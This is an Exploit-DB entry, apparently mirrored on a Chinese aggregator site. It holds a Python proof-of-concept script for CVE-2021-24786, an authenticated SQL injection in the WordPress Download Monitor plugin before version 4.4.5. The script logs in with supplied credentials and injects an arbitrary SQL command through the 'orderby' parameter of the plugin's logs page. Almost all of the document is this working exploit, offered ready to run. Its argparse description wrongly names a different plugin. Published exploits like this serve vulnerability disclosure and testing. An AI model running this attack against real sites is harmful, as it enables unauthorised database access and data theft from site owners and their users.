WordPress Plugin Download Monitor WordPress V 4.4.4 – SQL Injection (Authenticated)

• Exploit Database
• 16 阅读

• 作者： Ron Jost
  日期： 2022-02-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50695/

• # Exploit Title: WordPress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
  # Date 28.01.2022
  # Exploit Author: Ron Jost (Hacker5preme)
  # Vendor Homepage: https://www.download-monitor.com/
  # Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
  # Version: < 4.4.5
  # Tested on: Ubuntu 20.04
  # CVE: CVE-2021-24786
  # CWE: CWE-89
  # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md
  
  '''
  Description:
  The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
  before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
  '''
  
  # Banner:
  banner = '''
  
   ___ ______ ___ ___________ _____ ___ __ 
  / __\/\ /\/__\|___ \ / _ \___ \/ ||___ \| || |___( _ ) / /_
   / / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ 
  / /___\ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |
  \____/ \_/\__/|_____|\___/_____|_||_____||_|/_/\___/ \___/ 
   
  [+] Download Monitor - SQL-Injection
  [@] Developed by Ron Jost (Hacker5preme)
  '''
  print(banner)
  
  import argparse
  import requests
  from datetime import datetime
  
  # User-Input:
  my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
  my_parser.add_argument('-T', '--IP', type=str)
  my_parser.add_argument('-P', '--PORT', type=str)
  my_parser.add_argument('-U', '--PATH', type=str)
  my_parser.add_argument('-u', '--USERNAME', type=str)
  my_parser.add_argument('-p', '--PASSWORD', type=str)
  args = my_parser.parse_args()
  target_ip = args.IP
  target_port = args.PORT
  wp_path = args.PATH
  username = args.USERNAME
  password = args.PASSWORD
  
  print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
  
  # Authentication:
  session = requests.Session()
  auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
  check = session.get(auth_url)
  # Header:
  header = {
  'Host': target_ip,
  'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Origin': 'http://' + target_ip,
  'Connection': 'close',
  'Upgrade-Insecure-Requests': '1'
  }
  
  # Body:
  body = {
  'log': username,
  'pwd': password,
  'wp-submit': 'Log In',
  'testcookie': '1'
  }
  auth = session.post(auth_url, headers=header, data=body)
  
  # Exploit (WORKS ONLY IF ONE LOG EXISTS)
  print('')
  print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
  print('')
  # Generate payload for SQL-Injection
  sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
  sql_injection_code = sql_injection_code.replace(' ', '+')
  exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
  exploit = session.get(exploitcode_url)
  print(exploit)
  print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))